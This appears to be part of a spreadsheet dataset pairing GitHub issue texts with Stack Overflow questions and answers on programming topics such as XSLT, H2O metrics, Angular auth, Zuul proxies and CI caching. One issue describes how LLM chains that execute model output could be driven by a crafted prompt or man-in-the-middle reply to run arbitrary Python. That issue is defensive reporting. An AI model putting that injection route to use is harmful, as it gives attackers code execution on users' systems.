      values["thing1"] = "hello";
      values["thing2"] = "world";
      var response = client.UploadValues("http://www.example.com/recepticle.aspx", values);
      var responseString = Encoding.Default.GetString(response);
  }
GET
using (var client = new WebClient())
  {
      var responseString = client.DownloadString("http://www.example.com/recepticle.aspx");
  }</t>
  </si>
  <si>
    <t xml:space="preserve">Lately, I've been pondering the somewhat non-mainstream architecture of building raw XML on the server side, and then using an XSLT stylesheet on the client to transform the XML into the full UI.  Of course, a fallback mechanism would have to exist if the client was not capable of client side XSLT, in which case we'd just transform it for them on the server side.
I'm already intimately familiar with XSLT, and this approach seems to be a clean separation of presentation and content, completely forcing the data into XML, and using XSLT for presentation.
I'm also aware that this does add an extra layer of complexity to the application, which is just another moving part that can fail.
My question is: are there any big name or big traffic sites using this approach, and if so: what limitations/lessons learned did you take away from it?
Thanks Internet,
Zach
</t>
  </si>
  <si>
    <t>C259</t>
  </si>
  <si>
    <t>Incorrect equation for mean residual deviance for Gradient Boosting Machines using Poisson distributions
I have noticed that when using an H2OGradientBoostingEstimator with a Poisson distribution the reported mean residual deviance is different when compared to the results I get applying Scikit-Learn's mean_poisson_deviance function on the true and predicted values. This is not the case when I use H2OGeneralizedLinearEstimator instead. I found the following definition of deviance for Poisson distributions, nevertheless it is not the same as the one used for GLMs:
h2o-3/h2o-core/src/main/java/hex/DistributionFactory.java
Line 281 in 9c4d343
 public double deviance(double w, double y, double f) { 
As someone pointed out in the following post, similar discrepancies seem to be present for the Gamma deviance as well:
https://stackoverflow.com/questions/53485434/mean-residual-deviance-formula-in-h2o</t>
  </si>
  <si>
    <t>Thank you for pointing this out, while the backend equation located
here
is correct (so the implementation is correct), the equation in the documentation appears to be incorrect. I have created this
Jira ticket
to update the equation in the documentation. The ticket contains the correct equation along with helpful information to derive it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define BEGIN_RAW R&amp;quot;(
#define END_RAW )&amp;quot;
const char* foo =
BEGIN_RAW
    this is a
    raw string
END_RAW;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't work. It looks like the preprocessor itself resolves the raw string into a string token, or at least attempts to and fails because it doesn't find the closing quote sequence.&lt;/p&gt;
&lt;p&gt;What I want is the BEGIN_RAW macro to expand to the R&amp;quot;( and the END_RAW to expand to the )&amp;quot; characters at a point where the parser will recognize the expanded result as a raw literal string.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C26</t>
  </si>
  <si>
    <t>address issues with user being undefined as detailed on SO here https://stackoverflow.com/questions/48840957/angular-firebase-auth-service-user-always-undefined, which required a lot of refactoring of authorizationService including commenting out several methods, some of which makes me nervous, improve styling and validation of dialog box, make validation service methods more robust, remove location reload in login component that would have it stuck in an infinite refresh cycle</t>
  </si>
  <si>
    <t>Solved it! Changed authState and authError to be EventEmitters and just subscribe to those values in the login component. This will all eventually be moved to a different place and handled correctly anyway but for proof of concept this all works great!
angularfire.service.ts
@Output() public authState: EventEmitter&lt;any&gt; = new EventEmitter();
@Output() public authError: EventEmitter&lt;any&gt; = new EventEmitter();
public emailLogin(email: string, password: string) {
    this.fbAuth.auth.signInWithEmailAndPassword(email, password)
      .then((fireBaseUser) =&gt; {
        this.authState.emit(fireBaseUser);
      })
      .catch(error =&gt; {
          if (error.code === 'auth/invalid-email' || error.code === 'auth/wrong-password' || error.code === 'auth/user-not-found') {
              this.authError.emit('The username and password you entered did not match our records. Please double-check and try again.');
          } else if (error.code === 'auth/user-disabled') {
              this.authError.emit('Your account has been suspended. Please contact us directly to discuss this.');
          } else {
            this.authError.emit(error.message);
          }
      });
  }
login.component.ts
constructor(private fb: FormBuilder, private firebaseService: AngularfireService) {
		this.form = this.fb.group({
			email: '',
			password: ''
		});
		this.firebaseService.authState.subscribe(user =&gt; console.log(user));
		this.firebaseService.authError.subscribe(error =&gt; console.log(error));
	}</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the scenario:
I'm writing an app that will watch for any changes in a specific directory. This directory will be flooded with thousands of files a minute each with an "almost" unique GUID. The file format is this:
GUID.dat where GUID == xxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
(the internal contents aren't relevant, but it's just text data)
My app will be a form that has one single text box that shows all the files that are being added and deleted in real time. Every time a new file comes in I have to update the textbox with this file, BUT I must first make sure that this semi-unique GUID is really unique, if it is, update the textbox with this new file.
When a file is removed from that directory, make sure it exists, then delete it, update textbox accordingly.
The problem is that I've been using the .NET filewatcher and it seems that there is an internal buffer that gets blown up every time the (buffersize + 1)-th file comes in. I also tried to keep an internal List in my app, and just add every single file that comes in, but do the unique-GUID check later, but no dice.
</t>
  </si>
  <si>
    <t>C260</t>
  </si>
  <si>
    <t>save method in controller class tries to save components, that are not serializable. Therefore the save function does not work atm
The model and controller methods work as intended.
BufferedImages aren't serializable. I would recommend moving everything related to visualization to the view including the bufferedimage.
Alternative: implement serializable wrapper method: https://stackoverflow.com/questions/15058663/how-to-serialize-an-object-that-includes-bufferedimages</t>
  </si>
  <si>
    <t>make your ArrayList&lt;BufferedImage&gt; transient, and implement a custom writeObject() method. In this, write the regular data for your ImageCanvas, then manually write out the byte data for the images, using PNG format.
class ImageCanvas implements Serializable {
    transient List&lt;BufferedImage&gt; images;
    private void writeObject(ObjectOutputStream out) throws IOException {
        out.defaultWriteObject();
        out.writeInt(images.size()); // how many images are serialized?
        for (BufferedImage eachImage : images) {
            ImageIO.write(eachImage, "png", out); // png is lossless
        }
    }
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        final int imageCount = in.readInt();
        images = new ArrayList&lt;BufferedImage&gt;(imageCount);
        for (int i=0; i&lt;imageCount; i++) {
            images.add(ImageIO.read(in));
        }
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">In building an ASP.NET 3.5 WAP, I'm always frustrated by the feeling that no matter how I "isolate" or "encapsulate" bits of logic or UI I'm still going to bring down the whole site any time I need to update a single line of code. I may be misunderstanding how ASP.NET handles changes in the "bin" directory, but given the number of "why is my AppDomain unloading?" messages in the various groups this still seems like something to avoid.
Does anyone have any guidance and/or frameworks to truly modularize an ASP.NET 3.5 WAP so that logic and pages can be added/updated "in flight"? I Googled System.AddIn a bit, but it seems to be focused on WPF applications.
Thanks for your help!
James White
</t>
  </si>
  <si>
    <t>C261</t>
  </si>
  <si>
    <t>Security concerns
I have some concerns about the way some of this code is implemented.
To name the two I've noticed so far, the llm_math and sql_database chains.
It seems these two will blindly execute any code that is fed to it from the llm
This is a major security risk, since this opens anyone who uses these up for remote code execution. (The python one more then the sql one).
With a mitm attack, anyone can just return back a piece of code in the reply, pretending it is the bot. And if that's not enough, with some well crafted prompt, you can probably make it execute code as well (by making the llm return text with the same prompt pattern but custom python code)
I understand that this is in very early beta, but I've already seen this used in different places, due to ChatGPT's popularity.
In any case, it might be beneficial to switch from exec() to eval() for the python calculator, since eval() is build for the purpose of evaluating math expressions.
There are plenty of useful sources online on how to do it safely and what to look out for. Here are some examples:
https://stackoverflow.com/questions/10661079/restricting-pythons-syntax-to-execute-user-code-safely-is-this-a-safe-approach
PyPy sandbox (I recommend using this):
https://doc.pypy.org/en/latest/sandbox.html
Example of how difficult this problem is:
https://softwareengineering.stackexchange.com/questions/191623/best-practices-for-execution-of-untrusted-code/191628#191628</t>
  </si>
  <si>
    <t>Two points I noticed that you could still improve:
You should always escape any output that can be generated from some form of user input. In your example, the unallowed identifiers get mirrored unmodified back to the output. This could potentially be exploited, one example being
Cross Site Scripting
. Therefore I would additionally escape any such error message to prevent this.
Another thing you need to be aware of is Denial-of-Service attacks. Imagine someone whips up an Ackermann function and a script to submit it a couple of thousand times to your server... To prevent this, you should timebox the execution time of any code being submitted. This is essential, because this type of "attack" often happens unintentionally - someone managed to produce an infinite loop.
Edit:
Finally, I would also recommend to update your Python version to prevent a
"hashDoS" attack
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A while back, I wrote an Excel script to compare two Arrays, A and B. Each array represents the regulations applicable to a document's revision, and this script uses the Filter function to identify any differences between them. I've included a custom version of the code below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sub Main()
    Dim ArrA() As String
    Dim ArrB() As String
    Dim ArrC() As String
    Dim i As Integer
    Dim j As Integer
    Dim x As Integer
    Dim ws As Worksheet
    Set ws = ActiveWorkbook.Worksheets(&amp;quot;Sheet1&amp;quot;)
    With ws
        ArrA = Split(Left(.Cells(1, 2), Len(.Cells(1, 2)) - 1), &amp;quot;, &amp;quot;)
        ArrB = Split(Left(.Cells(2, 2), Len(.Cells(2, 2)) - 1), &amp;quot;, &amp;quot;)
        ArrC = ArrB
        For i = 0 To UBound(ArrA)
            ArrC = Filter(ArrC, ArrA(i), False)
        Next i
        Debug.Print &amp;quot;Added: &amp;quot; &amp;amp; Join(ArrC, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;
        .Cells(4, 2) = Join(ArrC, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;
        .Cells(8, 2) = SortCFR(Join(ArrA, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;, &amp;quot; &amp;amp; Join(ArrC, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;)
        ArrC = ArrA
        For i = 0 To UBound(ArrB)
            ArrC = Filter(ArrC, ArrB(i), False)
        Next i
        Debug.Print &amp;quot;Removed: &amp;quot; &amp;amp; Join(ArrC, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;
        .Cells(5, 2) = Join(ArrC, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;
        For i = 0 To UBound(ArrC)
            ArrA = Filter(ArrA, ArrC(i), False)
        Next i
        Debug.Print &amp;quot;Sustained: &amp;quot; &amp;amp; Join(ArrA, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;
        .Cells(6, 2) = Join(ArrA, &amp;quot;, &amp;quot;) &amp;amp; &amp;quot;,&amp;quot;
        ArrA = Split(Left(.Cells(4, 2), Len(.Cells(4, 2)) - 1), &amp;quot;, &amp;quot;)
        ArrB = Split(Left(.Cells(5, 2), Len(.Cells(5, 2)) - 1), &amp;quot;, &amp;quot;)
        ArrC = Split(Left(.Cells(8, 2), Len(.Cells(8, 2)) - 1), &amp;quot;, &amp;quot;)
        x = 1
        For i = 0 To UBound(ArrC)
            For j = 0 To UBound(ArrA)
                If ArrC(i) = ArrA(j) Then
                    With .Cells(8, 2).Characters(Start:=x, Length:=Len(ArrC(i)) + 1).Font
                        .Underline = True
                        .Color = RGB(0, 0, 255)
                        GoTo Jump
                    End With
                End If
            Next j
            For j = 0 To UBound(ArrB)
                If ArrC(i) = ArrB(j) Then
                    With .Cells(8, 2).Characters(Start:=x, Length:=Len(ArrC(i)) + 1).Font
                        .Strikethrough = True
                        .Color = RGB(255, 0, 0)
                        GoTo Jump
                    End With
                End If
            Next j
Jump:
            x = x + Len(ArrC(i)) + 2
        Next i
    End With
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SortCFR is a custom sorting algorithm; we prefer to sort these regulations suffix-first, prefix-second.&lt;/p&gt;
&lt;p&gt;Cell B1 includes the regulations for the prior revision. B2 includes the regulations for the new revision. B4 includes all regulations that were added to the new revision. B5 includes all regulations that were removed since the previous revision. B6 lists all regulations maintained between both revisions and isn't actually used. B8 is a formatted list of all the regulations between both revisions. Everything removed is colored red and struck through. Everything added is colored blue and underlined. You can view an example of the script's output below:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/pzc4uXqf.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/pzc4uXqf.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;It works great in Excel, and I want to use this script in my Access database as well, but Access doesn't support VBA's Filter function. I've gotten a modified version of this script working that individually compares the elements of each array, but it's slower. Is there anything equivalent to the Filter function in Access? Should I just reverse-engineer it and implement it as a Module?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C262</t>
  </si>
  <si>
    <t>Spring MVC/Servlet implementation
I meant the original implementation in Netflix Zuul provided the /zuul/ prefix based bypass of DispatcherServlet because of some suckiness (a comment I saw on SO - https://stackoverflow.com/a/32100705 ) in DispatcherServlet, I think related to buffering of request/response or something like that. That will still be the issue in new SCG MVC implementation right? Hence my question. May be I am misunderstanding as to why originally /zuul/ support was added. And I did not mean to ask for exact /zuul/ prefix solution, but equivalent that deals with the original isuue.</t>
  </si>
  <si>
    <t>From this commit:
Allow streaming of multipart requests in Zuul proxy
It turns out that the suckiness of Zuul with multipart requests comes almost entirely from the Multipart handling in Spring's DispatcherServlet. This change makes the proxy routes available on an alternative path /zuul/&lt;normal_path&gt; (where /zuul is the default value of zuul.servletPath). I have tested those with 800MB file uploads using the main method in the FormZuulServletProxyApplicationTests and the main observation is that there is no OutOfMemory error (no-one tries to download the complete request body). It works with Ribbon and with the simple (HttpClient) filter. With Ribbon you will need to set some timeouts if you want to upload files as large as that, e.g. see application.yml in the tests:
hystrix.command.default.execution.isolation.thread.timeoutInMilliseconds: 60000
ribbon:
  ConnectTimeout: 3000
  ReadTimeout: 60000
You need to set "Transfer-Encoding: chunked" in the incoming request. Chrome does not do this by default apparently, but I was able to test with curl, e.g.
$ curl -v -H "Transfer-Encoding: chunked" \
  -F "file=@mylarg.iso" \
  localhost:9999/zuul/direct/file
The old proxy paths through the DispatcherServlet are still available (for backwards compatibility and for convenience of having the paths available at the root of the context path).</t>
  </si>
  <si>
    <t xml:space="preserve">I am building an application that is very similar to a shopping cart.  The user selects a product from a list, and then based on that product, a few properties need to be set and saved.
Example.
If the user selects a type of paint that allows custom color matches, then I must allow them to enter in a formula number that they received through a color match process. So I have an Order Detail item for a Product that is a type of Paint, and that sku has the attribute of "AllowsCustomColorMatch", but I need to store the Formula Number somewhere also.
I'm not sure how to handle this elegantly throughout my code.  Should I be creating subclasses or products?  Right now I'm saving the data the user enters in an OrderDetails object that has a reference to the Product it is associated with.
</t>
  </si>
  <si>
    <t>C263</t>
  </si>
  <si>
    <t>Build APPartment.API.csproj
https://stackoverflow.com/questions/29383705/mvc-and-web-api-projects-in-the-same-solution
https://softwareengineering.stackexchange.com/questions/246380/should-we-call-web-api-from-mvc-application-in-same-solution</t>
  </si>
  <si>
    <t>This 2 projects are independent from each other like 2 different applications even if they are in the same solution.
To succeed what you try to achieve you have to:
1) Deploy your MVC project to www.example.com (main virtual application).
2) Deploy your WebAPI project to www.example.com/api (api folder is a virtual application). Don't forget to remove api from your WebAPI routes (other wise you have to use this route www.example.com/api/api/controller).
Doing this you can acces independently both projects in the same url.
For NInject part, you can register again the services in the MVC project. Another solution will (which i recommend) be to make a class library project and register there the services after that you reference this class library in both projects.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A machine building a C++ project solution in Visual Studio erroneously generates the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error executing C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.38.33130\bin\Hostx64\x64\cl.exe (tool returned code: 2)
[106/749] Compile [x64] cl : Command line error D8037 : cannot create temporary il file; clean temp directory of old il files (0:00.09 at +0:00)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The message itself is erroneous, despite &lt;a href="https://learn.microsoft.com/en-us/cpp/error-messages/tool-errors/command-line-error-d8037?view=msvc-170" rel="noreferrer"&gt;Microsoft's documentation&lt;/a&gt;, as the machine's &lt;code&gt;%TMP%&lt;/code&gt; folder contains none such files mentioned and lots of disk space is available. The machine runs a completely fresh install of Windows 11 and is only configured to run builds for this project and nothing else. Other machines with an identical setup compiles the project without problems.&lt;/p&gt;
&lt;p&gt;As this is a completely fresh Windows install, I have verified that the &lt;code&gt;%TMP%&lt;/code&gt; environment path points to an existing folder (as expected located in &lt;code&gt;AppData&lt;/code&gt;) with adequate permissions and that all other environment variables are pointing correctly.&lt;/p&gt;
&lt;p&gt;I am unable to provide a minimal reproducible example since I don't understand why this is happening, however I have debugged the situation to provide the following information:&lt;/p&gt;
&lt;h2&gt;Process monitor findings&lt;/h2&gt;
&lt;p&gt;Using ProcMon when executing the build reveals the the &lt;code&gt;CreateFileMapping&lt;/code&gt; operation called from &lt;code&gt;msvcp140.dll&lt;/code&gt; returns a &amp;quot;FILE LOCKED WITH ONLY READERS&amp;quot; message, no other information is provided.&lt;/p&gt;
&lt;h2&gt;Indicative workarounds&lt;/h2&gt;
&lt;h3&gt;cl.exe run as admin&lt;/h3&gt;
&lt;p&gt;By setting &lt;code&gt;cl.exe&lt;/code&gt; to &amp;quot;Run this program as an administrator&amp;quot; the build can be executed, however this of course generates loads of UAC prompts and is not a viable solution. Disabling UAC will allow the operation to fully build, with the added caveat of new command prompt windows being generated for each module built with &lt;code&gt;cl.exe&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Run Build Insights&lt;/h3&gt;
&lt;p&gt;Building the solution using the &amp;quot;Run Build Insights&amp;quot; rebuild option in Visual Studio will cause the project to build normally, and running additional builds pass without any issues. This is however not a viable solution as the project needs to build without this bypass.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Everything seems to point to a permission error, whereas &lt;code&gt;cl.exe&lt;/code&gt; is for some reason unable to write files to the system's &lt;code&gt;%TMP%&lt;/code&gt; folder. This is supported by the run build insights workaround, as that type of build supposedly instantiates its own developer environment with a separate temp folder.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C264</t>
  </si>
  <si>
    <t>Test OWSLib PR allowing POST for WFS getfeature requests #2 . We need to make WFS requests for info on many subregions. For a large number of regions, the GET requests exceeds the maximum size. See geopython/OWSLib#439
When I implemented the Post method, I ran accros this problem, but only while testing with Boreas (the only Ouranos Geoserver I tried).
I had no problems with other Geoservers, either external or locally deployed.
The only way I got it to work was to sacrifice this bit of code : https://github.com/f-PLT/OWSLib/blob/wfs-getfeature-post/owslib/feature/__init__.py#L312-L320
If I made it use the "outside" address https://pavics.ouranos.ca/geoserver/wfs, meaning only having this line instead https://github.com/f-PLT/OWSLib/blob/wfs-getfeature-post/owslib/feature/__init__.py#L320, it then worked with Boreas, but lost the ability to be redirected by what OWSLib got back from the GetCapabilities, which I gather could be a problem for other servers.
The url given to OWSLib is https://boreas.ouranos.ca/geoserver/wfs, but the GetCapabilities of the WFS is pointing to http://boreas.ouranos.ca:80/geoserver/wfs, which is restricted (and usually redirected?). It seems to the be the case with Pavics : https://pavics.ouranos.ca/geoserver/wfs?request=GetCapabilities&amp;version=1.1.0
The same code is present for the Get method, but it does not interfere with the request.
I'm not familiar enough with how requests work and the finer points between Get vs Post requests, but my guess is it could be that the Post request does not handle redirection (or if it's possible to redirect it in the context of how OWSLib handles requests, which is outside of what I implemented).
It would also be consistent with this: https://stackoverflow.com/questions/31620987/redirecting-http-post-requests-to-https-post-requests#:~:text=You%20cannot%20redirect.,3. and https://softwareengineering.stackexchange.com/questions/99894/why-doesnt-http-have-post-redirect
From the above, to redirect a Post request seems like something we should avoid, so the ideal solution would be for the Geoserver's GetCapabilities to list the secured address.
However, I'm pretty sure we rely on Geoserver being unsecured locally so it can interact with the other services. Maybe new flag in getFeature() to force the use of the provided url, instead of searching for the provided one in the GetCapabilities? Not sure how good a design that would be though.</t>
  </si>
  <si>
    <t>You can do this with a 307 response. see below</t>
  </si>
  <si>
    <t xml:space="preserve">This is a question not really about "programming" (is not specific to any language or database), but more of design and architecture. It's also a question of the type "What the best way to do X". I hope does no cause to much "religious" controversy.
In the past I have developed systems that in one way or another, keep some form of inventory of items (not relevant what items). Some using languages/DB's that do not support transactions. In those cases I opted not to save item quantity on hand in a field in the item record. Instead the quantity on hand is calculated totaling inventory received - total of inventory sold. This has resulted in almost no discrepancies in inventory because of software. The tables are properly indexed and the performance is good. There is a archiving process in case the amount of record start to affect performance.
Now, few years ago I started working in this company, and I inherited a system that tracks inventory. But the quantity is saved in a field. When an entry is registered, the quantity received is added to the quantity field for the item. When an item is sold, the quantity is subtracted. This has resulted in discrepancies. In my opinion this is not the right approach, but the previous programmers here swear by it.
I would like to know if there is a consensus on what's the right way is to design such system. Also what resources are available, printed or online, to seek guidance on this.
Thanks
</t>
  </si>
  <si>
    <t>C265</t>
  </si>
  <si>
    <t>ci: Reuse docker cache
To allow docker cache reuse across images, we need to build the template
workspace first, then build the other workspaces. This can be done by
using the `workflow_run` event to trigger the build of the other
workspaces.
Since `workflow_run` does not natively support path matching, the
`paths-filter` action is used to identify changed files and determine
whether a workspace build is needed.
Unfortunately, the paths-filter action does not function as intended
when used with the workflow_run event due to the loss of commit
information. To address this limitation, a workaround involving the use
of artifacts between workflows is implemented to transfer the missing
information. Since transferring artifacts across workflows is not
natively supported, the community-provided download-artifact action
variant is utilized.
To allow the use of remote build cache, a non-default builder is
required, which can be enabled by `docker/setup-buildx-action`. We can
then use `--cache-from` and `--cache-to` flags to specify the cache.
The dedicated cache registry and `max` mode seems to be required instead
of the `inline` mode due to the use of multi-platform images and
multi-stage builds. I'm not 100% sure if this is required though.
References:
* dorny/paths-filter
  * https://github.com/dorny/paths-filter?tab=readme-ov-file#examples
  * https://stackoverflow.com/a/70711156
* workflow_run</t>
  </si>
  <si>
    <t>You could use the paths-filter custom action with if conditions at the jobs or step levels, using a setup job as preliminary to check if your specific path has been updated, saving the result as an output.
Here is an example
name: Paths Filter Example
on: [push, workflow_dispatch]
jobs:
  paths-filter:
    runs-on: ubuntu-latest
    outputs:
      output1: ${{ steps.filter.outputs.workflows }}
    steps:
    - uses: actions/checkout@v4
    - uses: dorny/paths-filter@v3
      id: filter
      with:
        filters: |
          workflows:
            - '.github/workflows/**'
    # run only if 'workflows' files were changed
    - name: workflow tests
      if: steps.filter.outputs.workflows == 'true'
      run: echo "Workflow file"
    # run only if not 'workflows' files were changed
    - name: not workflow tests
      if: steps.filter.outputs.workflows != 'true'
      run: echo "NOT workflow file"
  next-job:
    runs-on: ubuntu-latest
    # Wait from the paths-filter to be completed before starting next-job
    needs: paths-filter
    if: needs.paths-filter.outputs.output1 == 'true'
    steps:
      ...
That way, you could have something like this in your jobs: A --&gt; B or A --&gt; C depending on the path that has been updated.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does TypeScript infer U in the following code?&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;type ExtractPrefix&amp;lt;T&amp;gt; = T extends `${infer U}abc` ? U : never;
const mystring = &amp;quot;helloabc&amp;quot;
type Result = ExtractPrefix&amp;lt;typeof mystring&amp;gt;; // Result is 'hello'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does ${infer U}abc extract only &amp;quot;hello&amp;quot;?&lt;/p&gt;
&lt;p&gt;Also, if I change the pattern to ${infer U}c, the result becomes &amp;quot;helloab&amp;quot;. How does TypeScript determine where to stop inferring U?&lt;/p&gt;
&lt;p&gt;Iâ€™m struggling to understand how infer U works. Could someone clarify?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C266</t>
  </si>
  <si>
    <t xml:space="preserve">My ASP.NET application needs a number of supporting services to run periodically in the background. For example:
I need to query the database (or cache) every 1-5 minutes, identify overdue work items and notify users by email
I need to generate nightly reports that are then emailed to subscribers
Plus other system/non-user admin tasks
What is the best way to implement these services? Should I include them as part of the web application, starting an instance of each 'service' in Application_Start()? Or create them as actual standalone services? If they were part of the web application I can potentially utilize my cached data store, but are there any downsides to this approach?
Thanks for any advice.
</t>
  </si>
  <si>
    <t>C267</t>
  </si>
  <si>
    <t xml:space="preserve"> publis(MVP 1.2): Achieve basic form validation with linkage effect 
to submit button
- Bug fix the warning change uncontrolled input to controlled input
* https://stackoverflow.com/questions/47012169/a-component-is-changing-an-uncontrolled-input-of-type-text-to-be-controlled-erro
- linkage effect to submit button with validation state
* when there is no error in detailMsg, and all detail been create, set Submit button available
* as setState is async, only can get current state after the update in useEffect
- Todo
* write unit test for all component
* Refactor the validator function</t>
  </si>
  <si>
    <t>The reason is, in state you defined:
this.state = { fields: {} }
fields as a blank object, so during the first rendering this.state.fields.name will be undefined, and the input field will get its value as:
value={undefined}
Because of that, the input field will become uncontrolled.
Once you enter any value in input, fields in state gets changed to:
this.state = { fields: {name: 'xyz'} }
And at that time the input field gets converted into a controlled component; that's why you are getting the error:
A component is changing an uncontrolled input of type text to be controlled.
Possible Solutions:
1- Define the fields in state as:
this.state = { fields: {name: ''} }
2- Or define the value property by using Short-circuit evaluation like this:
value={this.state.fields.name || ''}   // (undefined || '') = ''</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;Trait&lt;/code&gt; called &lt;code&gt;HasDefault&lt;/code&gt;
its main purpose is to ensure that the class has a static field &lt;code&gt;$default&lt;/code&gt; which is callable and returns the default instance of the class using the Trait&lt;/p&gt;
&lt;p&gt;This is what the Trait code looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static $default;
public static function setDefault(callable $fn): void
{
    self::checkWhetherCallableReturnsClass($fn);
    self::$default = $fn;
}
public static function getDefault(): static
{
    if (!isset(static::$default)) {
        static::initDefault();
    }
    return call_user_func(static::$default);
}
protected static function initDefault(): void
{
    static::$default = function (): static {
        return new static();
    };
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is important is that the Trait call &lt;code&gt;$default&lt;/code&gt; must return an object of the class that uses the Trait.&lt;/p&gt;
&lt;p&gt;For example, if the class &lt;code&gt;MySuperClass&lt;/code&gt; uses this trait, the object returned for it must be an object of the class &lt;code&gt;MySuperClass&lt;/code&gt; or classes that inherit from it.&lt;/p&gt;
&lt;p&gt;Basically, the check if this type is correct is in the &lt;code&gt;getDefault()&lt;/code&gt; return tag, but since the function returning the default instance can be replaced with another function, I wanted to make sure that it would return the correct object when calling &lt;code&gt;setDefault&lt;/code&gt;, and not when calling the &lt;code&gt;getDefault&lt;/code&gt; method.&lt;/p&gt;
&lt;p&gt;For this reason, I added the method &lt;code&gt;checkWhetherCallableReturnsClass&lt;/code&gt;, which is private, and its main task is to check, based on Reflection, if the return tag is correct and throw an exception if it is not.&lt;/p&gt;
&lt;p&gt;Generally, the method accepts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The class name.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;static&lt;/code&gt; or &lt;code&gt;self&lt;/code&gt; only in the case when &lt;code&gt;static&lt;/code&gt;/&lt;code&gt;self&lt;/code&gt; refers to a class like the one that uses the Trait.&lt;/li&gt;
&lt;li&gt;Or the above if the return type is IntersectionType e.g. &lt;code&gt;static&amp;amp;SomeInterface&lt;/code&gt; (With the caveat as above)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Problem&lt;/h3&gt;
&lt;p&gt;Now, the problem is how to test this. In most of these similar scenarios I'm using anonymous classes and it would look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private function getObjectThatIsCorrect(): object
{
    return new class(0) {
        use HasDefault;
        protected static function initDefault(): void
        {
            static::$default = function (): self {
                return new self(5);
            };
        }
        public function __construct(public int $fakeIdToRecognizeObjects)
        {
        }
        public function returnThisByStatic(): static
        {
            return $this;
        }
        public function returnThisBySelf(): self
        {
            return $this;
        }
        public static function returnsNewByStatic(): static
        {
            return new static(1);
        }
        public static function returnsNewBySelf(): self
        {
            return new self(2);
        }
    };
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And use that annonymous several times to test like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$object = $this-&amp;gt;getObjectThatIsCorrect();
$object::setDefault([$object, 'returnThisByStatic']);
$this-&amp;gt;assertEquals($object, $object::getDefault());
$object = $this-&amp;gt;getObjectThatIsCorrect();
$object::setDefault([$object, 'returnThisBySelf']);
$this-&amp;gt;assertEquals($object, $object::getDefault());
$object = $this-&amp;gt;getObjectThatIsCorrect();
$object::setDefault([$object, 'returnsNewByStatic']);
$this-&amp;gt;assertEquals(1, $object::getDefault()-&amp;gt;id);
$object = $this-&amp;gt;getObjectThatIsCorrect();
$object::setDefault([$object, 'returnsNewBySelf']);
$this-&amp;gt;assertEquals(2, $object::getDefault()-&amp;gt;id);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in this case everything will work perfectly, the problem arises when I want to test an anonymous function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function testSetDefault()
{
    $object = $this-&amp;gt;getObjectThatIsCorrect();
    $object::setDefault(function () use ($object) {
        return $object;
    });
    $this-&amp;gt;assertEquals($object, $object::getDefault());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that this of course won't work (and rightly so), because the anonymous function doesn't have any return tag declared.&lt;/p&gt;
&lt;p&gt;However, I can't do that, because the class is anonymous, so I don't know how I would put its name there.&lt;/p&gt;
&lt;p&gt;Secondly, even if I skipped this scenario and checked other methods, the problem is that i should also test if it works when that class is child of that class. But how I could extend anonymous class...&lt;/p&gt;
&lt;p&gt;I try other methods like &lt;code&gt;$this-&amp;gt;getMockForTrait()&lt;/code&gt;, &lt;code&gt;$this-&amp;gt;getObjectForTrait()&lt;/code&gt; but their are deprecated since: &lt;a href="https://github.com/sebastianbergmann/phpunit/issues/5244" rel="nofollow noreferrer"&gt;https://github.com/sebastianbergmann/phpunit/issues/5244&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;After reading this I began to question whether what I was doing was even worthwhile, and if not, why not. Not only am I unable to test it, but I also cannot answer the question whether what I am trying to achieve is worth it at all.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C268</t>
  </si>
  <si>
